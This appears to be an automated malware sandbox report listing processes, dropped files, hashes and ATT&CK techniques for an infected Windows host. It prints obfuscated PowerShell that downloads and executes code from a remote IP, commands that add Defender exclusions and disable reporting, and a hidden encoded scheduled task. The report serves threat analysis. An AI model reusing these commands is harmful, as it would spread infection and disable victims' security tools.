C:\Users\Admin\Pictures\Adobe Films\Y3X5pRZRvK28dS9n8HAj3ifV.exe
"C:\Users\Admin\Pictures\Adobe Films\Y3X5pRZRvK28dS9n8HAj3ifV.exe"
3⤵
PID:1720

C:\Users\Admin\Pictures\Adobe Films\iKwrAoqyZUHZj9GIOmcqD3Nt.exe
"C:\Users\Admin\Pictures\Adobe Films\iKwrAoqyZUHZj9GIOmcqD3Nt.exe"
3⤵
PID:2108

C:\Users\Admin\Pictures\Adobe Films\N_tF2vvI95AdPD68eLnfCMJU.exe
"C:\Users\Admin\Pictures\Adobe Films\N_tF2vvI95AdPD68eLnfCMJU.exe"
3⤵
PID:3008

C:\Users\Admin\Pictures\Adobe Films\wpUf2wPqVmbnQMQnLHNdBjTM.exe
"C:\Users\Admin\Pictures\Adobe Films\wpUf2wPqVmbnQMQnLHNdBjTM.exe"
3⤵
PID:3536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im wpUf2wPqVmbnQMQnLHNdBjTM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\wpUf2wPqVmbnQMQnLHNdBjTM.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:3940

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wpUf2wPqVmbnQMQnLHNdBjTM.exe /f
5⤵
- Kills process with taskkill
PID:648

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:3444

C:\Users\Admin\Pictures\Adobe Films\IPSa9ZO_BgEDSZIdHnLdracQ.exe
"C:\Users\Admin\Pictures\Adobe Films\IPSa9ZO_BgEDSZIdHnLdracQ.exe"
3⤵
PID:332

C:\Users\Admin\Pictures\Adobe Films\6DfCgJPfp4e1drs0iC5D_A6i.exe
"C:\Users\Admin\Pictures\Adobe Films\6DfCgJPfp4e1drs0iC5D_A6i.exe"
3⤵
PID:2728

C:\Users\Admin\Pictures\Adobe Films\Yb8QqCngFlJTlMY6rUlJuXc8.exe
"C:\Users\Admin\Pictures\Adobe Films\Yb8QqCngFlJTlMY6rUlJuXc8.exe"
3⤵
PID:3080

C:\Users\Admin\Pictures\Adobe Films\IgLlweaTzzYnKezlKkMIz2Bd.exe
"C:\Users\Admin\Pictures\Adobe Films\IgLlweaTzzYnKezlKkMIz2Bd.exe"
3⤵
PID:1184

C:\Users\Admin\Pictures\Adobe Films\dSs1mFIJUdUSpNJEIjCVTvpg.exe
"C:\Users\Admin\Pictures\Adobe Films\dSs1mFIJUdUSpNJEIjCVTvpg.exe"
3⤵
PID:1556

C:\Users\Admin\Pictures\Adobe Films\cAr9gfbq4GWu3ZksN4p4latD.exe
"C:\Users\Admin\Pictures\Adobe Films\cAr9gfbq4GWu3ZksN4p4latD.exe"
3⤵
PID:2672

C:\Users\Admin\Pictures\Adobe Films\7PXiKrQsOIhS0rhaNrZpgW6i.exe
"C:\Users\Admin\Pictures\Adobe Films\7PXiKrQsOIhS0rhaNrZpgW6i.exe"
3⤵
- Executes dropped EXE
PID:3264

C:\Users\Admin\Pictures\Adobe Films\kJOVHvYLti2ZrpdGQTyzK_v4.exe
"C:\Users\Admin\Pictures\Adobe Films\kJOVHvYLti2ZrpdGQTyzK_v4.exe"
3⤵
PID:3456

C:\Users\Admin\Pictures\Adobe Films\XaysnQMF_r4AeDffJia5F3r6.exe
"C:\Users\Admin\Pictures\Adobe Films\XaysnQMF_r4AeDffJia5F3r6.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2896

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:1884

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:1816

C:\Users\Admin\Pictures\Adobe Films\rtXw62iIgg78mS7VFHjXjsN_.exe
"C:\Users\Admin\Pictures\Adobe Films\rtXw62iIgg78mS7VFHjXjsN_.exe"
3⤵
- Executes dropped EXE
PID:2984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 748
4⤵
- Program crash
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 812
4⤵
- Program crash
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 896
4⤵
- Program crash
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1252
4⤵
- Program crash
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1260
4⤵
- Program crash
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1296
4⤵
- Program crash
PID:1816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "rtXw62iIgg78mS7VFHjXjsN_.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\rtXw62iIgg78mS7VFHjXjsN_.exe" & exit
4⤵
PID:4080

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "rtXw62iIgg78mS7VFHjXjsN_.exe" /f
5⤵
- Kills process with taskkill
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1320
4⤵
- Program crash
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3400 -ip 3400
1⤵
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3248 -ip 3248
1⤵
PID:3644

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv KECjp6QaQUCgsygyyZ+xfQ.0.2
1⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2984 -ip 2984
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2160 -ip 2160
1⤵
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1916 -ip 1916
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1720 -ip 1720
1⤵
PID:4608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1720 -ip 1720
1⤵
PID:4824

C:\Users\Admin\Pictures\Adobe Films\dSs1mFIJUdUSpNJEIjCVTvpg.exe
"C:\Users\Admin\Pictures\Adobe Films\dSs1mFIJUdUSpNJEIjCVTvpg.exe"
1⤵
PID:4784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\7zS186D.tmp\Install.exe
.\Install.exe /S /site_id "525403"
1⤵
PID:5060

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
2⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
3⤵
PID:4348

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
4⤵
PID:4504

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
4⤵
PID:1208

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
2⤵
PID:4436

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
3⤵
PID:5108

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3172

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
4⤵
PID:4540

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJhasfLtY" /SC once /ST 04:59:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3484

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJhasfLtY"
2⤵
PID:3400

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJhasfLtY"
2⤵
PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1916 -ip 1916
1⤵
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2160 -ip 2160
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2984 -ip 2984
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2672 -ip 2672
1⤵
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 468
1⤵
- Program crash
PID:4736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\7zS850.tmp\Install.exe
.\Install.exe
1⤵
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 624
1⤵
- Program crash
PID:4632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:4580

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2672 -ip 2672
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 660
1⤵
- Program crash
PID:860

C:\Users\Admin\AppData\Local\Temp\775d5e61-c51c-4c9d-b428-7a17e6b9bac2.exe
"C:\Users\Admin\AppData\Local\Temp\775d5e61-c51c-4c9d-b428-7a17e6b9bac2.exe"
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 476
1⤵
- Program crash
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2984 -ip 2984
1⤵
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2984 -ip 2984
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2984 -ip 2984
1⤵
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2984 -ip 2984
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5068 -ip 5068
1⤵
PID:2816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2984 -ip 2984
1⤵
PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5068 -ip 5068
1⤵
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2984 -ip 2984
1⤵
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5068 -ip 5068
1⤵
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2984 -ip 2984
1⤵
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5068 -ip 5068
1⤵
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5068 -ip 5068
1⤵
PID:4656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3048

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4508

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 600
3⤵
- Program crash
PID:772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2192 -ip 2192
1⤵
PID:4916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 416 -p 3456 -ip 3456
1⤵
PID:4912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 2780 -ip 2780
1⤵
PID:5228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 416 -p 4676 -ip 4676
1⤵
PID:5356

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
6a09621ec56ce00d3558321d99d4fb5b

SHA1
ca8b4717552d2a11f1569766e0cb328c1f71f52f

SHA256
4e7c2021da05e7e1d40a9845e8f7fbfbeee57827945cfe8b406c724d6b99dbad

SHA512
07d3a8a0f645850f18a1a7c5030d2b79807938f480fac061808a2040d7e777b5e4e16eba5d7ea2821cbb5fbfa2a1df0491be3d9cde9bab258f1c82d8d1e748e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
fb0a411f9683bf0bb1884afd509a7300

SHA1
7d2496d1908c030909d8945a19e145ccb0c36c00

SHA256
5bc6a35a61345c73b04ac2c3bd511166997b0c94d24e1076f4dd76c27a64a740

SHA512
68e7492a4155e80a456cbb5709033c8d5689c70f9f4c8b342c7d08d99dfb34c46242f9a638c1bed149b76e96b86ffb40a081e9b59fcbbfe153d08ad36ad5cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
fb0a411f9683bf0bb1884afd509a7300

SHA1
7d2496d1908c030909d8945a19e145ccb0c36c00

SHA256
5bc6a35a61345c73b04ac2c3bd511166997b0c94d24e1076f4dd76c27a64a740

SHA512
68e7492a4155e80a456cbb5709033c8d5689c70f9f4c8b342c7d08d99dfb34c46242f9a638c1bed149b76e96b86ffb40a081e9b59fcbbfe153d08ad36ad5cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
70aae7cb1d740226a0092f03d91198ac

SHA1
d7403661766b9c71b7077e46521e520fba8079ec

SHA256
2ddab1335ab3520e0ed44f1d2b5902da77b659ed22d2ecbc3bf858f77084e8d3

SHA512
062cf2526603787463f3fe5e8aadaad2543fc3800c22a9cf404e91745015ca7d4b4546258b0e1f2cbfcd148d169ee772b1defdc24191f90955fadb2e1b444dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
70aae7cb1d740226a0092f03d91198ac

SHA1
d7403661766b9c71b7077e46521e520fba8079ec

SHA256
2ddab1335ab3520e0ed44f1d2b5902da77b659ed22d2ecbc3bf858f77084e8d3

SHA512
062cf2526603787463f3fe5e8aadaad2543fc3800c22a9cf404e91745015ca7d4b4546258b0e1f2cbfcd148d169ee772b1defdc24191f90955fadb2e1b444dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
340a317a21e1cb74aa29e7b696f6ca41

SHA1
91eebd0d2d105fc014736237904c2833e4b41679

SHA256
8f0e52d7745f0acd774eefed66848ac62651022001dc8561f769f4b365e6db6f

SHA512
7841b7cfed3136f0f8414836bad838a24bd41143f48665921eaab401cae262a5a0b4126890dded5064a6f757c7c03af4aac87456e4519b570cd4fe7fcf3d8c75

Download Submit
C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
MD5
340a317a21e1cb74aa29e7b696f6ca41

SHA1
91eebd0d2d105fc014736237904c2833e4b41679

SHA256
8f0e52d7745f0acd774eefed66848ac62651022001dc8561f769f4b365e6db6f

SHA512
7841b7cfed3136f0f8414836bad838a24bd41143f48665921eaab401cae262a5a0b4126890dded5064a6f757c7c03af4aac87456e4519b570cd4fe7fcf3d8c75

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
ccea7df920e067ff02a85fddf668b9ce

SHA1
e91133acbc4c91bf738bd6170d0547f2378e366f

SHA256
5a172734000130667f20636263e0b6cd1d95e230e4a3f83adcb28898ac556c3c

SHA512
ebe32aafb115a5723704f22ebd756e462f4407d33536dad0418be7c4bf2d41598cf25490494b4a714686ad7acbf2b30a457533da92f974e025defcf60b80de4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
MD5
ccea7df920e067ff02a85fddf668b9ce

SHA1
e91133acbc4c91bf738bd6170d0547f2378e366f

SHA256
5a172734000130667f20636263e0b6cd1d95e230e4a3f83adcb28898ac556c3c

SHA512
ebe32aafb115a5723704f22ebd756e462f4407d33536dad0418be7c4bf2d41598cf25490494b4a714686ad7acbf2b30a457533da92f974e025defcf60b80de4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
94391d38abcfb81a8315857a70bc920c

SHA1
6dd19b70a306ff09c2fcb75a49259bab1dcb4e11

SHA256
f6e3e6ae2a161baa8ecbeb47a916203455e9f00d449301b7f101c36891b12975

SHA512
0869be209f3e8a6d71d54d45a9ecd4c86be1290508810c09e52f96affdda626c2be1dca54704c281ecb3413aa225311cca85daefd1ede46b5279375aa386db75

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
